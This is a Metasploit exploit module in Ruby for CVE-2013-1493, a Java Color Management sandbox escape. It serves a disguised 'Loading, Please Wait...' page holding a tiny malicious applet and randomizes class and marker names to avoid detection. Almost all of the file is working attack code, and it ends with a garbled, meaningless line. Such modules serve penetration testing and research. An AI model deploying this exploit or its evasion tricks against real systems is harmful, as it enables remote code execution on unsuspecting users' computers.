##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
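require 'msf/core'
require 'rex'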
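# Browser exploit module for CVE-2013-1493 (Java Color Management classes).
#
# The module runs an HTTP server that answers three kinds of request:
# the resource root (an HTML page embedding a 1x1 applet), a ".jar" path
# (the applet jar assembled from the framework's payload jar plus four
# pre-built class files shipped under data/exploits/cve-2013-1493), and a
# redirect to the root for anything else. The loader class name, the jar
# file name and the "metasploit"/"Payload" markers inside the jar are
# randomized per run; the click-to-play prompt is not bypassed.
class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::EXE
  include Msf::Exploit::Remote::BrowserAutopwn

  autopwn_info({ :javascript => false })

  # Registers the module metadata (name, description, references, payload
  # constraints, targets and disclosure date) with the framework.
  #
  # @param info [Hash] base module info, merged by +update_info+
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Java CMM Remote Code Execution',
      'Description'    => %q{
          This module abuses the Color Management classes from a Java Applet to run
        arbitrary Java code outside of the sandbox as exploited in the wild in February
        and March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
        and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
        systems. This exploit doesn't bypass click-to-play, so the user must accept the java
        warning in order to run the malicious applet.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Unknown',     # Vulnerability discovery and Exploit
          'juan vazquez' # Metasploit module (just ported the published exploit)
        ],
      'References'     =>
        [
          [ 'CVE', '2013-1493' ],
          [ 'OSVDB', '90737' ],
          [ 'BID', '58238' ],
          [ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],
          [ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],
          [ 'URL', 'http://pastie.org/pastes/6581034' ]
        ],
      'Platform'       => [ 'win', 'java' ],
      'Payload'        => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
      'Targets'        =>
        [
          [ 'Generic (Java Payload)',
            {
              'Platform' => 'java',
              'Arch'     => ARCH_JAVA
            }
          ],
          [ 'Windows x86 (Native Payload)',
            {
              'Platform' => 'win',
              'Arch'     => ARCH_X86
            }
          ]
        ],
      'DefaultTarget'  => 1,
      'DisclosureDate' => 'Mar 01 2013'
    ))
  end

  # Loads the four pre-built applet classes and randomizes the loader class
  # name before the HTTP server is started by +super+.
  #
  # @init_class is rewritten in place so that the literal "Init" it contains
  # matches @init_class_name, which is also used for the jar entry and the
  # applet tag.
  def setup
    @init_class           = read_class_file('Init.class')
    @leak_class           = read_class_file('Leak.class')
    @buffered_image_class = read_class_file('MyBufferedImage.class')
    @color_space_class    = read_class_file('MyColorSpace.class')

    # Same length as "Init", so the in-place rewrite does not change the
    # size of the class bytes.
    @init_class_name = rand_text_alpha('Init'.length)
    @init_class.gsub!('Init', @init_class_name)

    super
  end

  # Dispatches an incoming request by URI: ".jar" paths receive the applet
  # jar, paths ending in "/" receive the landing page (after the payload has
  # been regenerated for this client), and anything else is redirected to
  # the resource root.
  #
  # @param cli [Object] the client connection passed by the HTTP server mixin
  # @param request [Object] the parsed HTTP request (only +uri+ is read)
  def on_request_uri(cli, request)
    print_status("handling request for #{request.uri}")

    case request.uri
    when /\.jar$/i
      send_response(cli, build_jar, { 'Content-Type' => 'application/octet-stream' })
    when /\/$/
      payload = regenerate_payload(cli)
      unless payload
        print_error('Failed to generate the payload.')
        send_not_found(cli)
        return
      end
      send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
    else
      send_redirect(cli, get_resource + '/', '')
    end
  end

  # Renders the landing page: a minimal document that embeds the applet with
  # a random 8-letter jar name and the randomized loader class as +code+.
  #
  # @return [String] the HTML document, on a single line
  def generate_html
    jar_name = "#{rand_text_alpha(8)}.jar"

    %Q|<html><head><title>Loading, Please Wait...</title></head>| +
      %Q|<body><center><p>Loading, Please Wait...</p></center>| +
      %Q|<applet archive="#{jar_name}" code="#{@init_class_name}.class" width="1" height="1">| +
      %Q|</applet></body></html>|
  end

  private

  # Reads one of the pre-built applet classes from the framework's data
  # directory for this module.
  #
  # @param name [String] file name inside data/exploits/cve-2013-1493
  # @return [String] the raw (binary) class file contents
  def read_class_file(name)
    path = File.join(Msf::Config.install_root, 'data', 'exploits', 'cve-2013-1493', name)
    File.binread(path)
  end

  # Assembles the applet jar: the framework's encoded payload jar plus the
  # four applet classes, with the loader entry named after @init_class_name.
  # Every entry name and entry body then has "metasploit" and "Payload"
  # replaced by random strings of the same length, and the manifest is
  # rebuilt to reflect the final entries.
  #
  # @return [Object] the jar object returned by +payload.encoded_jar+, ready to send
  def build_jar
    jar = payload.encoded_jar
    jar.add_file("#{@init_class_name}.class", @init_class)
    jar.add_file('Leak.class', @leak_class)
    jar.add_file('MyBufferedImage.class', @buffered_image_class)
    jar.add_file('MyColorSpace.class', @color_space_class)

    metasploit_str = rand_text_alpha('metasploit'.length)
    payload_str    = rand_text_alpha('payload'.length)
    jar.entries.each do |entry|
      entry.name.gsub!('metasploit', metasploit_str)
      entry.name.gsub!('Payload', payload_str)
      entry.data = entry.data.gsub('metasploit', metasploit_str)
      entry.data = entry.data.gsub('Payload', payload_str)
    end

    jar.build_manifest
    jar
  end
end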
8 x% C/ n8 ]+ [( g2 g |